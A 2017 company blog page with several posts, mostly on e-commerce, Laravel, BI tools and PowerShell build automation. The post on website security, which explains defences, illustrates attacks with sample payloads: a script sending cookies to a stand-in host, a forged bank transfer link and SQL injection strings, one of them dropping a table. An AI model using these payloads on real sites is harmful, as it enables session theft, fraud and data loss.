Monday, October 9, 2017

How to make your website secure?



When we talk about website security there are 2 levels of security we should consider
  1. Application Level Security (Secure Website Development)
  2. Server Level Security (Maintain a secure website)

Application Level Security:

Creating Secure Websites shows how we can meet the most important security challenges when developing websites. Some of the security challenges are mentioned below.

1. Cross Site Scripting (XSS)

Cross-site Scripting (XSS) is client-side code injection attack where a hacker/attacker can execute malicious scripts into the web application, can steal user’s cookie which can be used for impersonation. XSS is amongst the most common of web application vulnerabilities and occurs when a web application accepts unsanitized input from a user and displays output instantly.
For example user or attacker added a comment with malicious script and when it displays, it will display like
<h1>Recent comment</h1>
<script>
    doSomethingDangerous();
   window.location=”http://dangerous.com/?cookie=” + document.cookie
</script>
Comment1
Comment2


 How to Prevent that:
Validate and sanitize (HTML Encode, URL Encode, Removing dangerous tags data, input by the user

2. Cross-Site Request Forgery (CSRF)

Cross-Site Request Forgery (CSRF) is an attack that forces an authenticated user to execute unwanted actions on a web application without their knowledge.

For example, a banking website mybank.com is not protected against CSRF. Typical GET request to transfer amount is HTTP://mybank.com/transfer.php?receiver=PersonA&amount=$50.

An attacker can change this script to transfer $50 to their own account and can share a link via email  HTTP://mybank.com/transfer.php?receiver=Attacker&amount=$50 with reading more link <a href=”HTTP://mybank.com/transfer.php?receiver=Attacker&amount=$50″>Read more</a>. So as soon as a user clicks on that link from email/text/blog and if user’s session is active in mybank.com then $50 would be transferred to Attacker.


How to Prevent that:

From Application End: Generate unique random tokens for every session request or ID when a page loads. Tokens would be checked and verified by the server on every request or form submission. Session requests having wrong tokens or duplicate tokens or missing values would be blocked.
From User end: Sign out from an application when not in use and not allowing a browser to remember passwords.

3. SQL Injection
SQL Injection (SQLI) is a common attack where the attacker can execute malicious SQL statements that control web application’s database server. This is most dangerous attack as it may destroy complete database of the application.

For example, a website A is not prevented with SQL injection then an attacker can get access of any user without login using user id and password.
For Example in login form user needs to input User Id and Password and query may run in database to validate user is

select * from users where user_id =’amit’ and password = ‘password’

So attacker may log in to amit’s account without knowing a password. The attacker will input below details in both boxes:
User Id: amit
Password: ‘ or ‘1’=’1

So query would be select * from users where user_id =’amit’ and password = ‘’ OR ‘1’ = ‘1’
As OR operator is being used and 1=1 always true so it will return details of user_id Amit and an attacker will get logged in access of amit’s account.
Even more dangerous impact could be deleting complete table or database

User Id: ‘; DROP TABLE users; /*
Password: */—

So query would be select * from users where user_id =’’; DROP TABLE users; /* and password = ‘password’ */—

As there is semicolon then 2 queries would be executed and second query “DROP Table users” will completely delete user table and application will break completely.


How to Prevent:
  1. Use Prepared Statements: The use of prepared statements with variable binding ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the example above, if an attacker were to enter the userID of Amit and password of ‘ or ‘1’=’1, the parameterized query would not be vulnerable and would instead look for a password which literally matched the entire string ‘ or ‘1’=’1
  2. Validate user Input: Always validate input provided by a user and escape it before putting it in a query.
  3. Cast User Input: If a numeric input expected from a user then cast it to INT so that nonnumeric would be removed automatically.
  4. Restrict Privileges: Application Database user privileges should be restricted. It should not delete database or tables.
4. Session Hijacking

Session hijacking is a type of web attack in which attacker takes advantage of the active sessions (Temporary Identification) of logged in user.
 The actual user has logged in his account and then attacker steals the cookies to hijack the active session and play the role of a genuine user.


How to Prevent:
  1. SSL (HTTPS): Use Secure HTTP (HTTPS) so that attacker can not hijack sessions.
  2. Session Destroy: Destroy session automatically if no activity from user after a certain time
5. Brute Force Attack

A brute force attack is a method which is used to obtain information such as a user password or personal identification number (PIN). An attacker would be continuously using different passwords to log in to a system until it succeeds.
  
How to Prevent:
  1. Strong Password: Encourage the user to use strong passwords Alphanumeric with special characters.
  2. Captcha: Ask a user to enter captcha answer if a user fails login 3-4 times.
  3. Lock Account: Lock user account for some time if login is failed multiple times.

 6. Web Form Spam

Web form spam is common attack by which attacker submits forms using Bots/Script to get more backlinks of their website. A form would be submitted thousand times by the Robot.

How to Prevent:
  1. Track Form Render and submission time: If form renders and submission time is too fast then it might be from script/bot
  2. Hidden Text box: Add a textbox in form with class required and hide it from CSS. A human cannot add data on that box as it is not visible but script may think that it is required field & add data. If data is added to that field then definitely it is script and does not store that data.
  3. Use Captcha: Use captcha so that script cannot read and submit a form.

Server Level Security:

  1. Keep plugin / CMS up to date: It is really important to update your site as soon as a new plugin or CMS version is available.
  2. URL & Password: Keep Admin URL different and something hard to guess instead of www.website.com/admin. Admin, Database, Server password should be strong and IP restricted.
  3. Access and Permission: It’s important that every user has the appropriate permission they need to do their job. If they need permissions temporarily, grant it, then change it once the job is complete. Double check what user/resources (Directories, files) has what access and permission. Restrict permissions based on access.
  4. Change Default CMS Settings: Many attacks happen on the default settings being used. We can avoid a large number of attacks by changing the default settings when installing CMS.
  5. Server Configuration: We should know our web server configuration files. Apache web servers use the .htaccess file, Nginx servers use nginx.conf and Microsoft IIS servers use web.config. These files are very powerful. These files allow us to execute server rules that compromise website security.
  6. Install SSL: SSL is important for website security and any website that accepts form submissions with sensitive user data. The SSL certificate protects visitor’s information in transit which protects us from noncompliant with PCI DSS.
  7. Back Up: Always back up a site so that we can recover our site even though it is being hacked or security compromised.

Friday, October 6, 2017

Get Your Website Ready for the Festive Season


Recent statistics from the year 2016 has revealed that smartphones and tablets drove a record $259 million in online sales on Black Friday last year, and $419 million in online sales on Cyber Monday last year. A report provided by CNBC and Business Insider respectively has stated that Amazon has captured more than half of all online sales growth in the last year and Walmart’s e-commerce sales rose by 63% just in the last quarter!

While all e-commerce sites are aware of this sales peak, the real question lies in how to prepare for this heavy traffic and how to make the most of it for your individual business?

Understanding the intricacies of handling your e-commerce sites as well as your customer goes a long way in boosting your sale. Here are some tips to enable a well-planned and prepared strategy for advancing your eCommerce sales during this holiday season:

Adapt to only small and avoid significant changes:

While most marketers would tell you to make substantial changes to your sales strategy, the changes on your e-commerce platform should be significant at the appropriate turns and not completely redo your website unless customers have remarked regarding the ease of use. Shoppers have the tendency to compare prices between sellers and if they are used to your site then they would be back to buy despite the marginal difference in cost provided they are comfortable around the easy navigation of your portal as well as happy with your payment options. Given the remarkable progress in digital money, looping in e-wallet platforms and offering flashy discounts or cash back options for your returning customers would help convert your sales rate into bigger numbers.

Be accessible to your customers:

Customers have constant queries related to products and service options alike. Having a separate customer support team to address every single question would be hard to keep track of, and therefore providing a self-servicing option would be a wise choice. While for constantly repeated queries keeping the FAQ section up to date would be ideal, adding in a feature of live chat would not only be a remarkable advantage of building confidence in the buyer to purchase from you but also help to convert them into returning customers to be highly satisfied with your e-commerce responsive customer service.

Market you and your product:

The primary step to get your sales reach desired proportions is to start by planning early. The holiday calendar is fixed and planning your strategies well ahead of time helps you to not only regulate sales effectively but also enable you to channelize them prospectively. Starting from doing a detailed market study of the current year’s trends to drawing up your shipping calendar and price plans will be the best markers from your marketing to sales conversion strategy.
  • Pick your desired festivals for sale, and draw up the promotional calendar which will outline your sales and marketing strategy from day one of your sale.
  • According to Roy Erez, CEO of Loop Commerce, a buyer hesitates to purchase gifts online due to infeasible return or refund options. Amping up your return and exchange policy through a regulated shipping channel will ensure a wider customer base. Do not forget on effective shipping strategy because 88% of online shoppers have rated free shipping as their driving factor for purchase.
  • Get all your planning done well ahead of the sale. Ensure that your ad copy, promotional email list, design and graphics, landing page, etc, is all prepared before the last minute of sale in order to both improvise on your strategy and to avoid technical glitches for a hassle free sale. Ensure your server does not crash due to overload as a frustrated customer would avoid purchase on your site.

Strategize the intricacies of your website and reap its benefits this holiday!

Monday, September 25, 2017

Ecommerce Strategy: 5 Reasons to Start Selling Online






The growth of e-commerce has spiked up in the recent years as compared to the traditional brick and mortar businesses because of the consumer reach through technological advancement and the availability of improved and flexible logistics. According to reports from the National Retail Federation, the growth of online retail has been expected to rise from 8% to a minimum of 12% in 2017 which would mean that the total revenue form e-commerce sales would fall somewhere between $427-$443 billion. Every sector of business, be it a startup or an established one, the advantages of expanding into the e-commerce domain are plenty. Below is a list of the top 5 reasons why starting the e-commerce venture is worthwhile:

  1. Couch start: The business arena today, whether it is the sale of a product or service, is driven by the advancement in technology. While expanding or starting a brick or mortar business will take a considerable amount of time to be fully functional, getting to the e-commerce platform is simple and just a few clicks away. There are various pre-existing websites that allow sales through their channels, as well as established vendors who can create the required web portal within a few hours. Without an actual retail outlet or a business center, an individual can easily sell from the confines of their lodging space with just a computer and internet access.
  1. Cost efficient: Most businesses require a significant amount of money to invest in marketing a product for sale. The e-commerce platform can enable a seller to start growing their business with a small investment and with the profitable returns the organization of an established business is easier. Some of the leading e-commerce websites are not easy and free to sign up but there is also the flexibility of using the certified logistics for a reasonable price, and a seller can essentially avoid the large upfront investment needed to grow a business. The use of resources like social media, Google AdWords, and organic search can help greatly with the marketing aspect, and also save on payroll costs.
  1. Online brand awareness: According to statistics and market trend reports, it is a recognized fact that customers first check out the products online regardless of whether they buy it online or through a retail store. Reports have shown that in 2014, close to 81% of shoppers followed this trend, and this number has only been growing ever since. Having an e-commerce platform for your product launches you in front of the customer and with the appropriate online marketing-strategy tools, these products can also be accelerated to be among the top searches or sales lists. This would also pave the way for potential customers to relate and order your product easily.
  1. Internet boundary: The sale via a typical brick and mortar shop may limit its sale to the geographical location, but the launch of an e-commerce platform enables the seller to reach customers in the global market. This not only ensures the widespread of sales but also aids with the gathering of new customers in varied markets around the globe.
  1. Growth in online sales: According to comScore reports, while the level of online purchasers was 47% and 48% in 2014 and 2015 respectively, the rate of online purchasers has grown to more than 51% currently. Taking to the e-commerce platform ensures that your sales are projected towards where the purchaser crowd in high than confining your product to a 4 walled-store.
In the words of Hil Davis, Co-Founder of the Online Men’s Retailer J. Hilburn, “e-commerce and mobile commerce have dramatically changed the way brands reach customers, making it faster and easier for consumers to make purchases on the fly while avoiding the hassles of going to the store.”

Friday, September 15, 2017

Why Laravel is the best PHP Framework of 2017



If you are wondering about some of the best PHP frameworks, then we would recommend Laravel. Many of top websites are built in 2017 are based on Laravel. With 33,356 stars on GIT till date, it is among the most popular PHP frameworks.

Let us understand why we think Laravel is an excellent PHP framework:

1) Developing an authorization and authentication systems :– Each web application owner wants to integrate role based application. Where users using the application should be authenticated and they can view and access the content based on their role. While developing this requires a lot of efforts, Laravel makes authentication and authorization development very straightforward. It is easy to develop and understand. The framework also provides a manageable way of organizing authorization logic as well as control resources access.

2) Object Oriented Concepts :– An important point which makes Laravel the popular PHP framework it is, is has Object Oriented libraries and many other pre-installed ones, which are not found in any other admired PHP frameworks. One of the pre -installed libraries is the Authentication library. In spite of the fact that it is easy to implement, it has many significant features, such as checking active users, bcrypt hashing, password reset, CSRF (Cross-site Request Forgery) protection, and encryption.

3) Artisan :– The key feature which Laravel offers is a built in the tool named as Artisan. A developer has to usually interact with the Laravel framework using a command line that creates and handles the Laravel project environment. Laravel provides the fitting tool for command-line called Artisan. This tool allows us to perform the majority of those monotonous and tiresome programming tasks that most of the developers avoid performing manually.

4) MVC :– Additionally, the reason which makes Laravel the supreme PHP framework is, it supports MVC Architecture like Symfony, ensuring accuracy between logic and presentation. MVC helps in improving the performance, allows better documentation, and has multiple built-in features.

5) Application Security :– Nowadays, the importance of application security has emerged as a leading factor for companies. While developing an application everyone has to use some or the other ways to make the application secure. Laravel takes care of the security inside its framework. It uses salted and hashed password, which means that the password would never be saved as plain text in the database. It uses Bcrypt hashing algorithm for generating an encrypted representation of a password. Laravel uses prepared SQL statements which make injection attacks improbable. Along with this, Laravel provides a simple way to escape user input to avoid user injection of the <script> tag.

6) Database Migration :- Developers are always in dilemma, how to keep the database in sync between development machines. With Laravel database migrations, it seems a doodle. After the long work hours, you may have made a lot of changes to the database and, in my opinion; MySQL Workbench is not a great way to sync databases between development machines. Instead, use Laravel Migrations. As long as you keep all of the database work in migrations and seeds, you can easily migrate, the changes, into any other development machine you have. This is yet another reason which makes Laravel the supreme PHP framework.

7) Profound Tutorials (Laracasts) :– Developers need to keep learning and evolving his/her knowledge constantly. Unlike others (Codeigniter, Yii, CakePHP etc.) Laravel offers Laracasts which features a mix of free and paid video tutorials that show you how to use it. The videos are all made by Jeffery Way, an expert and master instructor. He seems to have his finger on the pulse of the essentials and offers clear and concise instructions. The production quality is high, and the lessons are well-thought out and meaningful.

8) Blade Templating Engine :- Blade is a simple, yet powerful templating engine provided with Laravel. Unlike other popular PHP templating engines, Blade does not restrict you from using plain PHP code in your views. In fact, all Blade views are compiled into plain PHP code and cached until they are modified; meaning Blade adds essentially zero overhead to your application.

9) Unit Testing :– Developers also like Laravel in the way it greases the wheel for Unit testing. Laravel is built with testing in mind. Testing with PHP UNIT is reinforced and included out of the box, and a PHPUnit.the XML file is already setup for your application. The framework also ships with convenient helper methods allowing you to expressively test your applications. Additionally, it performs several tests to make sure that any new update made by a developer does not unexpectedly break anything in the application.

10) Caching :– Caching is one of the important aspects of web development. Laravel provides a unified API for various caching systems. It makes it easy for us to switch out how we want to cache to be generated. It is extremely easy for us to switch out the drivers. The cache configuration is located at config/cache.php. Laravel supports popular caching backends like Memcached and Redis out of the box.

In Conclusion
Development of a web application is an alloy of common and creative tasks. Fine developers like to do all these common work (repeating from project to project) in as little time as possible (without loss of quality) before starting to write custom functions. Web frameworks are tools that make it easier to solve regular tasks quickly with the point to focus faster on own application’s logic (creative tasks).
Not all frameworks are able to solve each of the described problems equally well. The Supreme web frameworks such as Laravel help developers to do it and this means that Laravel-based development will make software delivery on time and cost-effective. Besides, Laravel is scalable. Also, it is not a problem finding new developers as this framework is well liked.

Monday, September 11, 2017

Five Reasons Why Business Intelligence Implementation Can Fail


 While there are loads of advice on how to institute a business intelligence (BI) tool into an organization’s curriculum, there is hardly any foresight on how to turn the BI tool into a part of the organization’s culture for effective usage. Scientific facts state that a smartphone is a tool that people just flash for having a sense of belonging with the crowd and use it only for limited purposes, and thereby fail to expend the smartphone’s full capabilities. Similarly, BI tools are not effectively expended and thus lose their value or fade out over time. Consequently, the critical question is: is it the smartphone’s fault or the user’s?
Bill Hostmann, a vice president and renowned analyst at Gartner, stated that “Despite years of investing in BI, many IT organizations have difficulty connecting BI with the business, and to get business users fully involved and out of the ‘Excel culture’ “. Periodical surveys have indicated that the following five reasons are the root cause for the implementation of BI tools to fail:
  1. Using The BI Tool As A Depository :- There has to be an efficient system of data management and the tradition of transcription culture among the employees should be imbibed in their system and the business support team should aid in the process of constant result generation. Nobody used computers when they were introduced, but today the whole world of business is progressively built around computers.
  2. Not Allowing Free Flow Of Data :-  Often employees collect data from the BI tools and transcribe them into the excel sheets or other similar formats and leave it there. This leads to stagnation, thereby leading to withholding of analysis from being circulated around the company. When crucial data is unavailable, the BI tools become ineffective to produce competent results. Instead of just collecting data, employees should have the responsibility to feed their results back into the system and allow access to other users, failing which there would be a slow motion domino collapse of the data.
  3. Plugging In A Third Man To Get The Answers :-  When organizations hit a rock wall, they give up and bring in third-party experts to take care of their business needs. This results in business decisions being formed from an outside-source rather than an in-house expert. Only employees that are part of the organization will be able to tackle and estimate the businesses’ problems because to an outsider it’s just meaningless numbers. The individual has to take the pick at the buffet table and not eat from another’s plate.
  4. Play Against Strategy :-  Most employees just think about the BI tool installed as a one stop shop for answer, but they need to strategically equip themselves to use the tool to their advantage. This also means that the BI tool should be up to date with the market and quality checked to ensure that the data is not being lost in transaction. Having a combined team of IT experts and business analysts dedicated towards the BI tool will ensure quality results.
  5. Failing To Train And Adapt :-  Employees believe that they are always right and that the software is beneath them. Having a positive approach towards change and trying out a handy BI tool only makes life easier. A BI tool only provides a wider berth of data to swim in, so adapting with technology only showcases the employees potential and does not undermine them for using a resource.
In the words of James Richardson, a research director at Gartner, “Business users must take a leadership role in the BI initiative — only with their full engagement will investment in BI ever realize its potential.”

Monday, August 28, 2017

Five ‘Must Haves’ in the Self-serving BI Tools

 

The world of business analytics has seen some major shifts in its analytical frame. The current demand for instant usability and conformability has made the traditional lengthy-process of getting out reports via business analyst or analysis-specific IT teams redundant. Even before the data reaches the actual business users for ultimate decision making, the time taken for the data travel and subsequent conversion causes it to expire upon arrival.

The rise of self-service business intelligence (BI) is indeed unfathomable. Several BI companies have established a strong foothold in BI and Gartner has also predicted that “self-service BI platforms will make up 80% of all enterprise reporting by 2020”. Self-service BI tools, as the term denotes, will not only eliminate the need for a mediator to transliterate the information into usable data but also help beat the time delay.

The major perk of a self-service BI tool is that, in comparison to a lot of BI data analytics tools in the market that require SQL developers or BI experts, a person of reasonable understanding would be able to use the tool’s dashboard to easily manipulate the data into the required track. Without any specialized training, the management, marketing, business development, or any controlling department within the business could easily access the businesses’ database to build the necessary reports to answer crucial business questions.

Here are the top 5 ‘must haves’ when you consider a self-service BI tool:
  1.    One Stop Shop – The tool must be able to correlate data and not be a restricted user interface requiring multiple individuals to manually generate statistics and then have another one drive the final report. In short, one tool should be the one stop for all business needs.
  1.    Easily Integrated – Tool should be easy to integrate into existing systems in order to be able to get it working without any delay or the requirement of a major system upgrade in the existing database. Adaptability is a priority.
  1.    Real-time – Constant real-time update feasibility to ensure that the numbers are live and not require a constant error due to poor data feeds.
  1.    Simplified Decision Making – Avoid “decision fatigue” that can be the downfall of a business. It is important for the BI tool dashboard to allow a user to ease of access to even high-end data processing so that warranted decisions can be taken without a glitch.
  1.    Time & Money Saver – Lastly, the tool should not be a time or money consumer, because otherwise, businesses tend to take a negative approach towards the BI tool.
Bernard Marr, author of ― Big Data: Using SMART Big Data, Analytics and Metrics To Make Better Decisions and Improve Performance, stated that “As business leaders, we need to understand that lack of data is not the issue. Most businesses have more than enough data to use constructively; we just don’t know how to use it. The reality is that most businesses are already data rich, but insight poor.”  The scope of self-service BI tools is to try and cut through the precise data by having department specific users navigate through the abundant data and use it to their leverage instead of the traditional group of BI experts salvaging random data.

In nutshell, self-serving BI tools anticipate providing independent access to critical data without any constraints. Nevertheless, it is important to factor in that every tool needs regular maintenance and appraising without which an error-free analytics tool would completely collapse over time.

Friday, August 18, 2017

Build Automation using PowerShell



Now that we know why build automation is needed, in this detailed post I will cover how to approach build automation using PowerShell. Since this is a technical post I have included the list of acronyms and some useful links towards the end for reader’s benefits.

Background & Requirement

We use Microsoft Visual studio to develop our .Net projects. For a modestly sized client project with both web services and windows services, we were initially relying on manual approach to create daily builds and deploy it on QA, UAT and Production servers. On an average, this was taking around 2 hours of a DevOps Team member and more if some issues crop up. QA was getting delayed every morning getting the link for QA server with new build. We needed to automate this workflow as much as possible.
I was asked to undertake the task. Being a newbie to this, I did some research and found that doing Continuous integration (CI) means to use different tools and tool sets. Tools that I could use were Team City, Jenkins, Team Foundation Server, Bamboo, Circle CI and so on. Most were excellent tools supporting entire stages of CI but these also cost money in terms of licenses, either per user or per seat. Besides cost, there were also learning curves and their own limitations.
I have worked with PowerShell since its alpha release in 2005 and grew fond of its power and versatility over time. I use it for most of my automation needs, be it personal or work related. A relatively new windows command shell, it is integrated with C# which makes it much more powerful than traditional windows CMD shell. Much loved and rarely rebuked, it has very vibrant user community in System management and automation space. Just do a Net search for common System Management tasks through PowerShell.  Through Powershell Core , it is also making its way in Linux world. PowerShell is released with many inbuilt cmdlets to do most of day to day work and a lot of windows components & other vendors have provided their own cmdlets to manage their environments through PowerShell command line.

Justification & Business Case

Faced with licensing costs & other constraints of traditional CI tools and my own comfort with PowerShell, I decided to script the whole Build Automation workflow using PowerShell. It was a wonderful decision. Automation has been working very well since 2 years and saving minimum 2 hours per day for a small project with 5 web services and 3 windows services and code stored in SVN repository. Later on, we extended it to work with much bigger project with 11 Visual Studio (VS) solutions and 71 VS projects with code stored in TFS (Team Foundation Server). It saved 3 hours per day on the second project. We could deploy this on any windows machine where Windows Management Framework (WMF) 4.0 can be installed. Everyone on development team was aware of the code build status and DevOps could use output of this process to deploy it inside client VPN.

Creating Build Management Framework

For our Build Management workflow, I used the below tools, cmdlets and techniques
  1. Retrieve code from source control using SVN command line and TFS PowerShell
  2. Modify Solution files and Project files which are plain XML and easily manipulated from PowerShell.
  3. Use exe to download on-demand packages.
  4. Use MSBUILD and MSDEPLOY to build and deploy to desired location.
  5. Use IIS PowerShell cmdlets to manage Web services and deploy them.
  6. Use Out of the box PowerShell cmdlets to manage Windows services.
  7. Validate deployments and do BVT using Invoke-WebRequest, Invoke-RestMethod and other out of the box cmdlets.
  8. Invoke our test suites written in TestNG or nUnit directly.
  9. Use Send-MailMessage to send mails with results and the attachments. Securely save Sender password in system through PowerShell Secure Capabilities.
If I had been automating build created in other environment like Java, Maven/Ant & Git, I could have easily installed these on my build machine and use the corresponding command line to get code and build it.

Major Benefit of the PowerShell based approach

Major benefits of using PowerShell to do Build Automation as per me are as follows
  1. Easy availability and No Licensing cost – All things mentioned here are available free of cost on any windows computer. There is no ongoing cost beyond initial development cost.
  2. Easy deployability – This setup can be easily deployed anywhere on a windows computer and it can start working without much hitch.
  3. Easy maintenance – Once used to tweaking the configuration files required for it, even a novice DevOps engineer can maintain this. If DevOps team is well versed with PowerShell, they can even debug and update the scripts as and when needed.
  4. Modularity – I divided my solution in 4 parts, SVN fetch, Solution Modification, Build, Deploy. Most of the code in this is easily reusable across various .net projects.
  5. Longevity – Microsoft is committed to enhance PowerShell experience across the board, as also many vendors. Investment in this is not going to be wasted down the line.
  6. Existing knowledge – Most DevOps engineers have some exposure to PowerShell and can utilize their knowledge very easily in this rather than learning a new UI tool.
  7. Full control – PowerShell cmdlets and other command line tools usually expose more information and allow more fine-tuned control than any UI based tools which always need some scripting support.
With PowerShell, immense power is available with a DevOps engineer to tweak things as needed. Why run around and struggle with various evolving tools when everything is available easily to do most of the build automation tasks through out of the box tools?
Added advantage of a build automation project undertaken through PowerShell would be major knowledge upgrade for the DevOps team. They will be exposed to many tools & concepts and become more nimble & productive with effective usage of PowerShell in their day to day life.
Cmdlets available from others and coming with new software installation

As I noted earlier, many vendors have extended support for PowerShell through their own PowerShell cmdlet packages. I will list out few now which do not constitute an exhaustive list by any standards but gives a glimpse of what can be done through PowerShell from a DevOps architect perspective. If your workflow constitutes more steps than mentioned earlier, you may need to use one of the below.
  1. AWS tools for Windows PowerShell – Manage AWS services from the Windows PowerShell scripting environment.
  2. Azure PowerShell
  3. SQL Server PowerShell – SQL Server 2017 supports Windows PowerShell. PowerShell supports more complex logic than Transact-SQL scripts, giving SQL Server administrators the ability to build robust administration scripts.
  4. Oracle Cluster and PowerShell
  5. Net and Data Access – Connecting to Oracle Database from PowerShell.
  6. PowerShell for Docker – Under construction now, under open source project but very promising.
  7. Manage VPN Connections through PowerShell – If needed; connect to VPN before code download or deployment.
  8. Manage Windows Clusters through PowerShell
  9. Microsoft Office PowerShell cmdlets – Automate editing of Office Files.
  10. PowerShell in Jenkins – Use PowerShell scripts in Jenkins.

Links, Acronyms & Further readings

  1. PowerShell learning from Microsoft Virtual Academy
  2. Continuous integration – A development practice that requires developers to integrate code into a shared repository several times a day. Each check-in is then verified by an automated build, allowing teams to detect problems early.
  3. Windows management Framework – PowerShell upgrade
  4. List of Build Automation tools
  5. Some CI tools – Team City , Jenkins , Team Foundation Server , Bamboo , Circle CI
  6. SVN – Apache Subversion
  7. TestNG – TestNG is a testing framework inspired from jUnit and nUnit but introducing some new functionality that make it more powerful and easier to use.
  8. nUnit – NUnit is a unit-testing framework for all .Net languages
  9. QA – Quality Assurance
  10. UAT – User acceptance testing
  11. Cmdlets – a lightweight command that is used in the Windows PowerShell environment. The Windows PowerShell runtime invokes these cmdlets within the context of automation scripts that are provided at the command line.
Software Development Blogs - BlogCatalog Blog Directory RSS Search Technology Blogs - Blog Rankings Blog Directory